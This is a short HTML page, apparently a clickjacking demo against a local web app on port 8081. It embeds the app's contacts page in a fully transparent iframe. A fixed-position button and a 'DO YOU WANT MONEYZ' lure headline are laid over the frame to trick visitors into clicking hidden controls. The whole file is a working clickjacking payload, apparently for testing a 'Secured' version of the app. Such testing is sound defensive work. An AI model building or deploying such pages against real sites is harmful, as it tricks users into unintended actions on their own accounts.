<!DOCTYPE html>
<html>
<head lang="en">
    <meta charset="UTF-8">
    <title>Clickjacking Attack to Secured Webapp (8081) </title>
    <style type="text/css">
        .hidden-frame{
            width: 500px;
            height: 60px;
            opacity: 0;
        }
        .overlap-btn{
            position: fixed;
            left: 420px;
            top: 115px;
        }
    </style>

</head>
<body ng-controller="ContactsController">

    <h1>DO YOU WANT MONEYZ???!!!!!</h1>

    <button class="overlap-btn">MONYZ!</button>

    <iframe class="hidden-frame" src="http://localhost:8081/contacts" frameborder="0" seamless="seamless" scrolling="no"></iframe>

</body>
</html>